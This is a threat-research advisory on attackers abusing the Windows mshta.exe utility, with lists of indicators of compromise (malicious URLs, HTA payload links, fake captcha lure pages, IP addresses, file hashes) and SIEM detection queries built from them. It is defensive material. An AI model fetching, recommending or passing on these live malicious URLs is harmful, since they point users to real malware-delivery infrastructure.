Microsoft’s MSHTA Legacy Tool Still Powers Malware Campaigns on Windows

    Wednesday, May 20, 2026 In: Threat Research Print

    Date: 05/20/2026

    Severity: High

    Summary

    Threat actors continue to abuse MSHTA (mshta.exe), a legacy Windows utility and Living-off-the-Land binary (LOLBIN), to execute malicious VBScript and JavaScript code while blending into legitimate system activity. The tool is being used across a wide range of campaigns, from commodity malware such as stealers and loaders to more advanced threats, often through multi-stage fileless attack chains involving PowerShell and HTA scripts. Combined with social engineering techniques like fake software downloads and ClickFix lures, MSHTA remains a significant attack vector despite its legacy status. 

    Indicators of Compromise (IOC) List 

    Urls/Domains

    http://185.147.124.40/Capcha.html

    http://92.255.57.155/Capcha.html

    https://denek.local-wanderer.shop/RIWZ.mp4

    https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4

    https://macphotoeditor.shop/singl5.mp4

    https://topofsuper.shop/re5.mp4

    https://antibot-check.icu/Capcha.html

    https://checkpageonce.com/singl6.mp4

    https://echoicedeals.shop/s6.mp3

    https://kizmond.shop/riiw1.mp4

    https://klipjaqemiu.shop/web44.mp4

    https://macphotoeditor.shop/singl6.mp4

    https://onceletthemcheck.com/singl5.mp4

    https://pawpaws.readit-carfanatics.com/madonna.mp4

    https://propofgustestyle.info/recaptcha-verify.html

    https://recaptcha-process.com/recaptcha-verify.html

    https://retrosome.shop/ru2-2.eml

    https://savecoupons.store/s7.mp4

    https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae

    https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8

    https://thepremiumstuffs.shop/s5.mp4

    https://triptrip.melody-wave.shop/re2.mp4

    https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0

    https://driftcharm.shop/S6.mp4

    https://etrademart.shop/s6.mp3

    https://scrutinycheck.cash/singl5.mp4

    https://simplerwebs.space/anrek.mp4

    https://simplerwebs.world/mine.json

    https://asq.d6shiiwz.pw/win/hssl/d6.hta

    https://asd.s7610rir.pw/win/checking.hta

    https://d1.pool4883.pw/win/hssl/r7.hta

    http://us1.somepools555.pw/win/checking.hta

    memory-scanner.cc

    fileless-market.cc

    hell1-kitty.cc

    holiday-forever.cc

    system-monitor.cc

    forest-entity.cc

    indeanapolice.cc

    files-storage.cc

    some-othertag.cc

    s3-updatehub.cc

    s3-microservice-updatehub.cc

    microservice-update-s2-bucket.cc

    parent-control.cc

    alphazero1-endscape.cc

    microservice-update-s1-bucket.cc

    globalsnn2-new.cc

    polystore9-servicebucket.cc

    hardware-office.cc

    immortal-service.cc

    globalsnn1-new.cc

    acio-patron.cc

    hell10-kitty.cc

    globalsnn3-new.cc

    alpha-centavr.cc

    hell3-kitty.cc

    hell4-kitty.cc

    hell5-kitty.cc

    hell6-kitty.cc

    hell7-kitty.cc

    hell8-kitty.cc

    hell9-kitty.cc

    azure-s3-bucket.cc

    hosting-control.cc

    communicationfirewall-security.cc

    hell2-kitty.cc

    domain-monitoring.cc

    network-defender.cc

    critical-service.cc

    google-services.cc

    offshore-storage.cc

    urugvai.cc

    web3-walletnotify.cc

    debank-api.cc

    py-installer.cc

    memory-protection-layer1.cc

    s10-microservice-updatehub.cc

    sentinel1-endpoint-security.cc

    s4-microservice-updatehub.cc

    s5-microservice-updatehub.cc

    s6-microservice-updatehub.cc

    s7-microservice-updatehub.cc

    s8-microservice-updatehub.cc

    s9-microservice-updatehub.cc

    s1-microservice-updatehub.cc

    s2-microservice-updatehub.cc

    ms-team-ping6.com

    holiday-updateservice.com

    health-smooth-eu3.com

    health-smooth-eu2.com

    fileless-storage-s3.cc

    bigbrainsholdings.com

    my-smart-house1.com

    explorer.vg

    ccleaner.gl

    microservice.gl

    geo-foundation.vg

    deluxe.gl

    silverhost.vg

    msgrouppolicy.vg

    holypriest.gl

    msedge.vg

    IP Address

    185.208.159.199

    87.96.21.84

    58.221.252.210

    60.173.116.152

    61.136.101.152

    61.147.108.92

    89.117.2.159

    100.1.121.27

    103.36.223.87

    103.55.70.212

    103.83.212.194

    103.115.17.90

    103.113.195.244

    107.175.187.11

    110.42.51.229

    110.45.196.155

    122.165.219.142

    156.224.232.98

    157.66.153.154

    173.208.166.226

    187.102.48.229

    190.111.12.242

    193.112.70.226

    201.138.238.195

    204.44.110.216

    222.73.29.92

    Hash

    AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9

    02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE

    1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84

    333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2

    38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D

    7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "fileless-market.cc" or url like "fileless-market.cc" or siteurl like "fileless-market.cc" or domainname like "s5-microservice-updatehub.cc" or url like "s5-microservice-updatehub.cc" or siteurl like "s5-microservice-updatehub.cc" or domainname like "https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae" or url like "https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae" or siteurl like "https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae" or domainname like "https://echoicedeals.shop/s6.mp3" or url like "https://echoicedeals.shop/s6.mp3" or siteurl like "https://echoicedeals.shop/s6.mp3" or domainname like "some-othertag.cc" or url like "some-othertag.cc" or siteurl like "some-othertag.cc" or domainname like "https://kizmond.shop/riiw1.mp4" or url like "https://kizmond.shop/riiw1.mp4" or siteurl like "https://kizmond.shop/riiw1.mp4" or domainname like "https://simplerwebs.world/mine.json" or url like "https://simplerwebs.world/mine.json" or siteurl like "https://simplerwebs.world/mine.json" or domainname like "urugvai.cc" or url like "urugvai.cc" or siteurl like "urugvai.cc" or domainname like "hell4-kitty.cc" or url like "hell4-kitty.cc" or siteurl like "hell4-kitty.cc" or domainname like "msedge.vg" or url like "msedge.vg" or siteurl like "msedge.vg" or domainname like "holiday-forever.cc" or url like "holiday-forever.cc" or siteurl like "holiday-forever.cc" or domainname like "hell3-kitty.cc" or url like "hell3-kitty.cc" or siteurl like "hell3-kitty.cc" or domainname like "globalsnn1-new.cc" or url like "globalsnn1-new.cc" or siteurl like "globalsnn1-new.cc" or domainname like "azure-s3-bucket.cc" or url like "azure-s3-bucket.cc" or siteurl like "azure-s3-bucket.cc" or domainname like "parent-control.cc" or url like "parent-control.cc" or siteurl like "parent-control.cc" or domainname like "https://d1.pool4883.pw/win/hssl/r7.hta" or url like "https://d1.pool4883.pw/win/hssl/r7.hta" or siteurl like "https://d1.pool4883.pw/win/hssl/r7.hta" or domainname like "holiday-updateservice.com" or url like "holiday-updateservice.com" or siteurl like "holiday-updateservice.com" or domainname like "bigbrainsholdings.com" or url like "bigbrainsholdings.com" or siteurl like "bigbrainsholdings.com" or domainname like "globalsnn2-new.cc" or url like "globalsnn2-new.cc" or siteurl like "globalsnn2-new.cc" or domainname like "web3-walletnotify.cc" or url like "web3-walletnotify.cc" or siteurl like "web3-walletnotify.cc" or domainname like "http://185.147.124.40/Capcha.html" or url like "http://185.147.124.40/Capcha.html" or siteurl like "http://185.147.124.40/Capcha.html" or domainname like "hell5-kitty.cc" or url like "hell5-kitty.cc" or siteurl like "hell5-kitty.cc" or domainname like "memory-protection-layer1.cc" or url like "memory-protection-layer1.cc" or siteurl like "memory-protection-layer1.cc" or domainname like "sentinel1-endpoint-security.cc" or url like "sentinel1-endpoint-security.cc" or siteurl like "sentinel1-endpoint-security.cc" or domainname like "health-smooth-eu2.com" or url like "health-smooth-eu2.com" or siteurl like "health-smooth-eu2.com" or domainname like "domain-monitoring.cc" or url like "domain-monitoring.cc" or siteurl like "domain-monitoring.cc" or domainname like "https://recaptcha-process.com/recaptcha-verify.html" or url like "https://recaptcha-process.com/recaptcha-verify.html" or siteurl like "https://recaptcha-process.com/recaptcha-verify.html" or domainname like "forest-entity.cc" or url like "forest-entity.cc" or siteurl like "forest-entity.cc" or domainname like "microservice-update-s1-bucket.cc" or url like "microservice-update-s1-bucket.cc" or siteurl like "microservice-update-s1-bucket.cc" or domainname like "s1-microservice-updatehub.cc" or url like "s1-microservice-updatehub.cc" or siteurl like "s1-microservice-updatehub.cc" or domainname like "silverhost.vg" or url like "silverhost.vg" or siteurl like "silverhost.vg" or domainname like "hell10-kitty.cc" or url like "hell10-kitty.cc" or siteurl like "hell10-kitty.cc" or domainname like "msgrouppolicy.vg" or url like "msgrouppolicy.vg" or siteurl like "msgrouppolicy.vg" or domainname like "ccleaner.gl" or url like "ccleaner.gl" or siteurl like "ccleaner.gl" or domainname like "hosting-control.cc" or url like "hosting-control.cc" or siteurl like "hosting-control.cc"

    Detection Query 2 :

    domainname like "acio-patron.cc" or url like "acio-patron.cc" or siteurl like "acio-patron.cc" or domainname like "hell2-kitty.cc" or url like "hell2-kitty.cc" or siteurl like "hell2-kitty.cc" or domainname like "my-smart-house1.com" or url like "my-smart-house1.com" or siteurl like "my-smart-house1.com" or domainname like "health-smooth-eu3.com" or url like "health-smooth-eu3.com" or siteurl like "health-smooth-eu3.com" or domainname like "network-defender.cc" or url like "network-defender.cc" or siteurl like "network-defender.cc" or domainname like "hell8-kitty.cc" or url like "hell8-kitty.cc" or siteurl like "hell8-kitty.cc" or domainname like "hell9-kitty.cc" or url like "hell9-kitty.cc" or siteurl like "hell9-kitty.cc" or domainname like "https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4" or url like "https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4" or siteurl like "https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4" or domainname like "https://scrutinycheck.cash/singl5.mp4" or url like "https://scrutinycheck.cash/singl5.mp4" or siteurl like "https://scrutinycheck.cash/singl5.mp4" or domainname like "s3-microservice-updatehub.cc" or url like "s3-microservice-updatehub.cc" or siteurl like "s3-microservice-updatehub.cc" or domainname like "deluxe.gl" or url like "deluxe.gl" or siteurl like "deluxe.gl" or domainname like "alpha-centavr.cc" or url like "alpha-centavr.cc" or siteurl like "alpha-centavr.cc" or domainname like "s10-microservice-updatehub.cc" or url like "s10-microservice-updatehub.cc" or siteurl like "s10-microservice-updatehub.cc" or domainname like "alphazero1-endscape.cc" or url like "alphazero1-endscape.cc" or siteurl like "alphazero1-endscape.cc" or domainname like "hardware-office.cc" or url like "hardware-office.cc" or siteurl like "hardware-office.cc" or domainname like "immortal-service.cc" or url like "immortal-service.cc" or siteurl like "immortal-service.cc" or domainname like "hell7-kitty.cc" or url like "hell7-kitty.cc" or siteurl like "hell7-kitty.cc" or domainname like "geo-foundation.vg" or url like "geo-foundation.vg" or siteurl like "geo-foundation.vg" or domainname like "https://etrademart.shop/s6.mp3" or url like "https://etrademart.shop/s6.mp3" or siteurl like "https://etrademart.shop/s6.mp3" or domainname like "py-installer.cc" or url like "py-installer.cc" or siteurl like "py-installer.cc" or domainname like "https://antibot-check.icu/Capcha.html" or url like "https://antibot-check.icu/Capcha.html" or siteurl like "https://antibot-check.icu/Capcha.html" or domainname like "https://macphotoeditor.shop/singl6.mp4" or url like "https://macphotoeditor.shop/singl6.mp4" or siteurl like "https://macphotoeditor.shop/singl6.mp4" or domainname like "memory-scanner.cc" or url like "memory-scanner.cc" or siteurl like "memory-scanner.cc" or domainname like "files-storage.cc" or url like "files-storage.cc" or siteurl like "files-storage.cc" or domainname like "hell6-kitty.cc" or url like "hell6-kitty.cc" or siteurl like "hell6-kitty.cc" or domainname like "s7-microservice-updatehub.cc" or url like "s7-microservice-updatehub.cc" or siteurl like "s7-microservice-updatehub.cc" or domainname like "http://92.255.57.155/Capcha.html" or url like "http://92.255.57.155/Capcha.html" or siteurl like "http://92.255.57.155/Capcha.html" or domainname like "s8-microservice-updatehub.cc" or url like "s8-microservice-updatehub.cc" or siteurl like "s8-microservice-updatehub.cc" or domainname like "https://checkpageonce.com/singl6.mp4" or url like "https://checkpageonce.com/singl6.mp4" or siteurl like "https://checkpageonce.com/singl6.mp4" or domainname like "http://us1.somepools555.pw/win/checking.hta" or url like "http://us1.somepools555.pw/win/checking.hta" or siteurl like "http://us1.somepools555.pw/win/checking.hta" or domainname like "s6-microservice-updatehub.cc" or url like "s6-microservice-updatehub.cc" or siteurl like "s6-microservice-updatehub.cc" or domainname like "https://onceletthemcheck.com/singl5.mp4" or url like "https://onceletthemcheck.com/singl5.mp4" or siteurl like "https://onceletthemcheck.com/singl5.mp4" or domainname like "https://simplerwebs.space/anrek.mp4" or url like "https://simplerwebs.space/anrek.mp4" or siteurl like "https://simplerwebs.space/anrek.mp4" or domainname like "https://retrosome.shop/ru2-2.eml" or url like "https://retrosome.shop/ru2-2.eml" or siteurl like "https://retrosome.shop/ru2-2.eml"

    Detection Query 3 :

    domainname like "https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8" or url like "https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8" or siteurl like "https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8" or domainname like "critical-service.cc" or url like "critical-service.cc" or siteurl like "critical-service.cc" or domainname like "indeanapolice.cc" or url like "indeanapolice.cc" or siteurl like "indeanapolice.cc" or domainname like "https://topofsuper.shop/re5.mp4" or url like "https://topofsuper.shop/re5.mp4" or siteurl like "https://topofsuper.shop/re5.mp4" or domainname like "https://asq.d6shiiwz.pw/win/hssl/d6.hta" or url like "https://asq.d6shiiwz.pw/win/hssl/d6.hta" or siteurl like "https://asq.d6shiiwz.pw/win/hssl/d6.hta" or domainname like "https://savecoupons.store/s7.mp4" or url like "https://savecoupons.store/s7.mp4" or siteurl like "https://savecoupons.store/s7.mp4" or domainname like "https://driftcharm.shop/S6.mp4" or url like "https://driftcharm.shop/S6.mp4" or siteurl like "https://driftcharm.shop/S6.mp4" or domainname like "https://thepremiumstuffs.shop/s5.mp4" or url like "https://thepremiumstuffs.shop/s5.mp4" or siteurl like "https://thepremiumstuffs.shop/s5.mp4" or domainname like "ms-team-ping6.com" or url like "ms-team-ping6.com" or siteurl like "ms-team-ping6.com" or domainname like "hell1-kitty.cc" or url like "hell1-kitty.cc" or siteurl like "hell1-kitty.cc" or domainname like "offshore-storage.cc" or url like "offshore-storage.cc" or siteurl like "offshore-storage.cc" or domainname like "explorer.vg" or url like "explorer.vg" or siteurl like "explorer.vg" or domainname like "globalsnn3-new.cc" or url like "globalsnn3-new.cc" or siteurl like "globalsnn3-new.cc" or domainname like "s4-microservice-updatehub.cc" or url like "s4-microservice-updatehub.cc" or siteurl like "s4-microservice-updatehub.cc" or domainname like "system-monitor.cc" or url like "system-monitor.cc" or siteurl like "system-monitor.cc" or domainname like "communicationfirewall-security.cc" or url like "communicationfirewall-security.cc" or siteurl like "communicationfirewall-security.cc" or domainname like "https://asd.s7610rir.pw/win/checking.hta" or url like "https://asd.s7610rir.pw/win/checking.hta" or siteurl like "https://asd.s7610rir.pw/win/checking.hta" or domainname like "debank-api.cc" or url like "debank-api.cc" or siteurl like "debank-api.cc" or domainname like "https://pawpaws.readit-carfanatics.com/madonna.mp4" or url like "https://pawpaws.readit-carfanatics.com/madonna.mp4" or siteurl like "https://pawpaws.readit-carfanatics.com/madonna.mp4" or domainname like "microservice.gl" or url like "microservice.gl" or siteurl like "microservice.gl" or domainname like "s9-microservice-updatehub.cc" or url like "s9-microservice-updatehub.cc" or siteurl like "s9-microservice-updatehub.cc" or domainname like "https://propofgustestyle.info/recaptcha-verify.html" or url like "https://propofgustestyle.info/recaptcha-verify.html" or siteurl like "https://propofgustestyle.info/recaptcha-verify.html" or domainname like "s3-updatehub.cc" or url like "s3-updatehub.cc" or siteurl like "s3-updatehub.cc" or domainname like "holypriest.gl" or url like "holypriest.gl" or siteurl like "holypriest.gl" or domainname like "https://denek.local-wanderer.shop/RIWZ.mp4" or url like "https://denek.local-wanderer.shop/RIWZ.mp4" or siteurl like "https://denek.local-wanderer.shop/RIWZ.mp4" or domainname like "google-services.cc" or url like "google-services.cc" or siteurl like "google-services.cc" or domainname like "https://macphotoeditor.shop/singl5.mp4" or url like "https://macphotoeditor.shop/singl5.mp4" or siteurl like "https://macphotoeditor.shop/singl5.mp4" or domainname like "microservice-update-s2-bucket.cc" or url like "microservice-update-s2-bucket.cc" or siteurl like "microservice-update-s2-bucket.cc" or domainname like "s2-microservice-updatehub.cc" or url like "s2-microservice-updatehub.cc" or siteurl like "s2-microservice-updatehub.cc" or domainname like "https://triptrip.melody-wave.shop/re2.mp4" or url like "https://triptrip.melody-wave.shop/re2.mp4" or siteurl like "https://triptrip.melody-wave.shop/re2.mp4" or domainname like "polystore9-servicebucket.cc" or url like "polystore9-servicebucket.cc" or siteurl like "polystore9-servicebucket.cc" or domainname like "https://klipjaqemiu.shop/web44.mp4" or url like "https://klipjaqemiu.shop/web44.mp4" or siteurl like "https://klipjaqemiu.shop/web44.mp4" or domainname like "https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0" or url like "https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0" or siteurl like "https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0" or domainname like "fileless-storage-s3.cc" or url like "fileless-storage-s3.cc" or siteurl like "fileless-storage-s3.cc"

    Detection Query 4 :

    dstipaddress IN ("103.55.70.212","185.208.159.199","61.147.108.92","58.221.252.210","103.36.223.87","103.115.17.90","157.66.153.154","89.117.2.159","187.102.48.229","222.73.29.92","122.165.219.142","110.42.51.229","60.173.116.152","100.1.121.27","103.113.195.244","87.96.21.84","110.45.196.155","103.83.212.194","107.175.187.11","173.208.166.226","156.224.232.98","201.138.238.195","61.136.101.152","204.44.110.216","190.111.12.242","193.112.70.226") or srcipaddress IN ("103.55.70.212","185.208.159.199","61.147.108.92","58.221.252.210","103.36.223.87","103.115.17.90","157.66.153.154","89.117.2.159","187.102.48.229","222.73.29.92","122.165.219.142","110.42.51.229","60.173.116.152","100.1.121.27","103.113.195.244","87.96.21.84","110.45.196.155","103.83.212.194","107.175.187.11","173.208.166.226","156.224.232.98","201.138.238.195","61.136.101.152","204.44.110.216","190.111.12.242","193.112.70.226")

    Detection Query 5 :

    sha256hash IN ("38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D","1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84","02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE","7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA","AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9","333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2")

    Reference:    

    https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows                     


    Tags

    MalwareMicrosoftMSHTALOLBinsStealerSocial EngineeringClickFix

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.